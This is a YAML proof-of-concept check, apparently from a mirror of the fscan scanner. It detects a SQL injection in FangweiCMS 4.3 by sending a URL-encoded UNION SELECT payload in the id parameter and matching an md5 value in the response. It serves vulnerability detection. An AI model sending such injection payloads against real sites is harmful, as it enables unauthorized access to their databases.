mirror of https://github.com/qwqdanchun/fscan.git
14 lines
491 B
YAML
14 lines
491 B
YAML
name: poc-yaml-fangweicms-sqli
|
|
set:
|
|
rand: randomInt(200000000, 210000000)
|
|
rules:
|
|
- method: GET
|
|
path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23
|
|
expression: |
|
|
response.body.bcontains(bytes(md5(string(rand))))
|
|
detail:
|
|
author: Rexus
|
|
Affected Version: "4.3"
|
|
links:
|
|
- http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/
|